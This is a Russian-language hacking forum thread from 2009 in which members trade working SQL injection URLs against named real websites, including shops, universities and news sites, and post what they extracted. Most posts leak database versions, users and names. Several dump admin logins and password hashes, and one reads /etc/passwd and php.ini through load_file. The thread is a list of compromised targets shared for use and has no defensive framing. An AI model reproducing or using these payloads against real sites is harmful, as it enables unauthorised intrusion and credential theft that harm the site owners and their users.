SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.baltichouse.spb.ru/index.php?language_id=1&section_id=-57+union+select+concat_ws(0x3a,user(),database(),version())
    Code:
    baltcspb@localhost:baltcspb:4.1.20-lk-log
     
  2. Swift

    Swift Banned

    Joined:
    27 Oct 2008
    Messages:
    78
    Likes Received:
    156
    Reputations:
    8
    http://www.nccu.edu.tw/news/detail.php?news_id=1+and+substring(@@version,1,1)=5
     
    2 people like this.
  3. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    star-modelgroup.com --- TIC=30
    http://www.star-modelgroup.com/index.php?PageID=27&LangID=0+anD+1=2+union+all+select+1,2,3,4,version(),6,7/*
    version - 4.1.22-standard-log
    user - starmod_usr@localhost
    database - starmod_mgf
    os - unknown-linux-gnu
     
    1 person likes this.
  4. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    Интернет-магазин снаряжения для подводного плавания и подводной охоты
    Code:
    http://plavniki.com.ua/products.php?act=prod&pid=-1618%20union%20select%20login%20from%20admins--
    4-я ветка
    зы: вывод в самом вверху,слева

    Детский магазинчик
    Code:
    http://www.baby-market.com.ua/catalog.php?id_cat=-21%20union%20select%201,2,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,4,5,6%20%20--
    4.0.27-log:user_babymarket:babymarket@localhost
    ТИЦ: 70

    Дом кожи
    Code:
    http://domko.com.ua/index.php?id=194&show=-259%20union%20select%201,2,3,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,5,6%20--
    5.0.51a-24-log:firstline_base:firstline_base@localhost
    ТИЦ: 10
    PR: 1

    Ещё магазинчик
    Code:
    http://agent.dp.ua/catalog.php?id=7&sub_id=6%20union%20select%201,2,3,4,5,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,7,8,9,10,11--
    4.1.22-log:agent:agent@localhost
    ТИЦ: 10
    PR: 2

    Магазин детских товаров
    Code:
    http://pingvi.com.ua/index.php?cat=-6%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,19,20,21,22,23%20--
    5.0.75-log:pingvi:pingvi@localhost
    и вот ещё нарыл, может кому то понадобиться
    Code:
    http://pingvi.com.ua/templates/vamshop/
    Code:
    http://pingvi.com.ua/templates/vamshop_table/
    Code:
    http://pingvi.com.ua/templates/
    Магазин швейных машин
    Code:
    http://saleshop.com.ua/index.php?idShopTovar=-25%20union%20select%201,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20--
    5.0.51a:shopsale2:shopsale2@localhost
     
    #10844 TELO, 13 Oct 2009
    Last edited: 13 Oct 2009
    3 people like this.
  5. hack-win32

    hack-win32 Member

    Joined:
    11 Oct 2009
    Messages:
    31
    Likes Received:
    37
    Reputations:
    1
    spring08787@localhost:spring:5.0.51
    Code:
    http://www.springscream.com/doc.php?id=-29+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10--

    user_pbg@localhost:db_pbg:5.0.62
    Code:
    http://www2.parquebiologico.pt/doc.php?id=-22+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
     
    #10845 hack-win32, 13 Oct 2009
    Last edited by a moderator: 13 Oct 2009
    1 person likes this.
  6. toross

    toross Banned

    Joined:
    11 Dec 2008
    Messages:
    0
    Likes Received:
    18
    Reputations:
    1
    5.0.67-community
    http://www.gai-mn.org/contact.php?id=-3+union+select+version(),2--

    5.0.41
    http://www.publicnewsservice.org/contact.php?id=-1+union+select+1,version(),3,4--

    5.0.32-Debian_7etch11-log
    http://cox.nofuture.org.uk/contacts/contact.php?id=-86+union+select+1,2,3,4,5,6,version(),8,9,10,11,12--
     
    #10846 toross, 13 Oct 2009
    Last edited by a moderator: 13 Oct 2009
    2 people like this.
  7. Phen1x

    Phen1x Member

    Joined:
    21 May 2006
    Messages:
    9
    Likes Received:
    13
    Reputations:
    0
    http://www.compareplastic.com/display.php?id=-1%20union%20select%20concat%28table_name,0x20,column_name,0x20,table_schema%29%20from%20information_schema.columns%20limit%20205,2/*&page=cat

    http://www.pcdiscounters.com/products.php?groupID=-1+union+select+1,concat%28table_name,0x20,column_name,0x20,table_schema%29+from+information_schema.columns+limit+177,200

    http://jennisonqc.com/search_result.php?part_id=-1%20union%20select%201,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14

    http://www.coastalgoods.com/product_list.php?cat_id=-1+union+select+1,2,concat%28table_name,0x20,column_name,0x20,table_schema%29+from+information_schema.columns+limit+223,10

    http://www.alvaco.com/products_detail.php?prod_id=-1 union select 1,concat(table_name,0x20,column_name,0x20,table_schema),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns limit 230,1
     
    #10847 Phen1x, 13 Oct 2009
    Last edited: 13 Oct 2009
    4 people like this.
  8. ..::TROYAN::..

    ..::TROYAN::.. Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    Code:
    http://lifemusic.su/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,username,password,user(),version())+from+admin--
    тиц 10
    [email protected]:4.1.22-log
     
    2 people like this.
  9. hack-win32

    hack-win32 Member

    Joined:
    11 Oct 2009
    Messages:
    31
    Likes Received:
    37
    Reputations:
    1
    4.1.25-log:wwwmetronicsru:metronic@localhost
    Code:
    http://metronics.ru/good.php?id=-1942943971+union+select+1,2,3,concat_ws(0x3a,version(),database(),user())--

    sinergy@localhost:letturelibere:5.0.45-community-nt
    Code:
    http://www.letturelibere.net/download.php?id=-242+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version()),9,10,11,12,13,14--

    [email protected]:dannyjgb2:5.0.68-percona-3-log
    Code:
    http://www.infobite.co.uk/UsedProducts/make.php?ID=-63+union+select+concat_ws(0x3a,user(),database(),version()),2--

    [email protected]:jdson:5.0.68-percona-3-log
    Code:
    http://www.theprintroomsupplycompany.co.uk/NewProducts/make.php?ID=-1+union+select+1,concat_ws(0x3a,user(),database(),version())--

    apishop@localhost:apishop:4.0.27
    Code:
    http://www.apishop.ru/good.php?id=-121+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),database(),version())--


    [email protected]:STEPH:5.0.67-USERSTATS-LOG
    Code:
    http://www.sgoralnick.com/design.php?id=-213+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14--

    gra34464_user@localhost:gra34464_graphix:4.1.22-standard-log
    Code:
    http://graphixsolutions.com.au/graphic-design.php?id=-14+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8--

    [email protected]:sizefactory:5.0.45-log
    Code:
    http://www.sizefactory.com/design.php?id=-2+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5--

    stoneast@localhost:stoneast:5.0.77
    Code:
    http://www.stoneast.com/php/design/design.php?id=-2+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

    [email protected]:jnoa_index:5.0.67-userstats-log
    Code:
    http://jeremynoa.com/site/design.php?id=-17+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7--
     
    #10849 hack-win32, 13 Oct 2009
    Last edited: 13 Oct 2009
    4 people like this.
  10. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    Code:
    http://forums.patchtimer.org/mobile/thread.php?id=-8517+union+select+1,concat_ws(char(32,58,32),user(),database(),version())--&forum=6&start=20
    joshscho_jschoof@localhost : joshscho_ptforums : 5.0.81-community-log
    
    http://forums.patchtimer.org/mobile/thread.php?id=-8517+union+select+1,concat_ws(char(32,58,32),user_group,user_name,user_password)+from+joshscho_coppermine.schoof_users--&forum=6&start=20
    
    
    http://forums.patchtimer.org/mobile/thread.php?id=-8517+union+select+1,concat_ws(char(32,58,32),user_group,user_name,user_password)+from+joshscho_duag.cpg14x_users--&forum=6&start=20
    
    
    http://forums.patchtimer.org/mobile/thread.php?id=-8517+union+select+1,concat_ws(char(32,58,32),username,user_password,user_level)+from+joshscho_hhguild.phpbb_users--&forum=6&start=20
    
    
    PS. Понравился юмор, вместо Page 404: "This page has been viewed 1,185,131 times. Why we will never know."
     
    #10850 nikp, 13 Oct 2009
    Last edited by a moderator: 13 Oct 2009
  11. Dyxxx

    Dyxxx Elder - Старейшина

    Joined:
    16 Feb 2009
    Messages:
    107
    Likes Received:
    155
    Reputations:
    24
    Visibledust.com pr5
    VisibleDust is the renowned producer of high quality DSLR cleaning products, especially tailored for the digital sensor.
    Code:
    [SIZE=2][COLOR=SlateGray]http://www.visibledust.com/products3.php?pid=-3'+union+select+null,null,null,null,null,null,concat_ws(char(32,124,32),version(),user(),database()),null,null,null,null,null,null,null,null,null,null,null,null,null,null+--+
    http://www.visibledust.com/products3.php?pid=-3'+union+select+null,null,null,null,null,null,concat_ws(char(32,124,32),name,address,city,province,country,postal,telephone,fax,email,website),null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+visibled_cart.distributors+limit+0,1+--+[/COLOR][/SIZE]
    5.0.67-log | visibled_9@localhost | visibled_cart
     
    2 people like this.
  12. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.most.zp.ua/history/index.php?id_article=31+UNION+SELECT+1,2,3,4,5,6,7,8,9+LIMIT+1,1

    Database Version: 4.1.22-log
    Database name: most
    User name: most@beta

    http://www.kanatka.crimea.ua/article/index.php?id_article=9+UNION+SELECT+1,2,3,4,5,6,7,8,9+LIMIT+1,1

    Database Version: 5.0.81-community
    Database name: kanatka_base
    User name: kanatka_user@localhost

    http://www.sevhwarang.com.ua/article/index.php?id_article=2+UNION+SELECT+1,2,3,4,5,6,7,8,9+LIMIT+1,1
    Database Version: 4.1.22-log
    Database name: sevhwarang
    User name: u_sevhwarang@localhost
     
    #10852 Rubaka, 13 Oct 2009
    Last edited: 13 Oct 2009
    1 person likes this.
  13. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.4justice.info/shownews.php?id=-4+union+select+1,2,3,4+from+mysql.user+--+

    http://www.ffbg.hartberg.info/shownews.php?id=-17+union+select+1,user,3,4,5+from+users+/*+

    http://www.parssupporterstrust.co.uk/index.php?ID=-1932'+uNiOn+sElEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+--+&CATEGORY2=3-News

    http://www.opera-rennes.fr/index.php?id=2796&theme=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a3a,tstamp,username,password,admin),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69+from+be_users+/*+

    http://www.lampire.com/news/article.php?news_id=-000000017'+union+select+1,2,3,4,concat_ws(0x3a3a,user_email,user_pw),6,7+from+Users+limit+1,1+--+

    http://www.unlockmorerock.com/news-article.php?news_id=-4'+union+select+1,2,3,concat_ws(0x3a3a,username,password,email),5,6,7+from+rock_users+/*+

    http://kennyloggins.com/news-article.php?news_id=-12'+union+select+1,2,3,4,5,6+/*+

    http://www.dckconcessions.com/news/article.php?news_id=-27'+union+select+1,username,3,4,5,6+from+user+--+

    http://www.aaronhifi.com/news-article.php?news_id=-8+uNiOn+sElEct+1,group_concat(tAble_Name),3,4,5+from+information_schema.tables+--+

    http://www.namcnevada.com/news/article.php?news_id=-47+union+select+1,2,3,4,5,6,7,8,9+/*+
     
    #10853 DezMond™, 14 Oct 2009
    Last edited: 14 Oct 2009
    3 people like this.
  14. hackmon

    hackmon Member

    Joined:
    16 Sep 2009
    Messages:
    58
    Likes Received:
    40
    Reputations:
    2
    Code:
    http://www.thaidye.com/showall.php?ID=-1+union+select+1,database%28%29,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
    thaidye_items
    5.0.67-community

    всем желаю великих денег
     
    1 person likes this.
  15. toross

    toross Banned

    Joined:
    11 Dec 2008
    Messages:
    0
    Likes Received:
    18
    Reputations:
    1
    4.1.25-Debian_mt1
    5.0.81-community

    4.1.22-max-log

    5.0.81-community-log
    5.0.75
    4.1.25-Debian_mt1
    4.1.22-standard
     
    3 people like this.
  16. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Казанский государственный медицинский университет.Web-портал научной части.
    Code:
    med_info:[email protected]:5.0.45
     
    3 people like this.
  17. ^YaHoo^

    ^YaHoo^ Banned

    Joined:
    2 Jan 2009
    Messages:
    22
    Likes Received:
    26
    Reputations:
    0
    4.1.25-log:niigb@localhost:wwwniigbru_cmsmy_niigb
     
  18. toross

    toross Banned

    Joined:
    11 Dec 2008
    Messages:
    0
    Likes Received:
    18
    Reputations:
    1
    все на сайте
     
    1 person likes this.
  19. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    http://www.eumetech.com/l.php?id=1+anD+1=8%20+uniON+all+seLEcT+login+from+users/*
     
    6 people like this.
  20. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    http://www.trends-in-newsrooms.org/articles.php?id=-20+union+all+select+load_file('/etc/passwd'),2,3,4,5,6,7--

    http://www.trends-in-newsrooms.org/articles.php?id=-20+union+all+select+load_file('/etc/php5/apache2/php.ini'),2,3,4,5,6,7--
     
    2 people like this.
Thread Status:
Not open for further replies.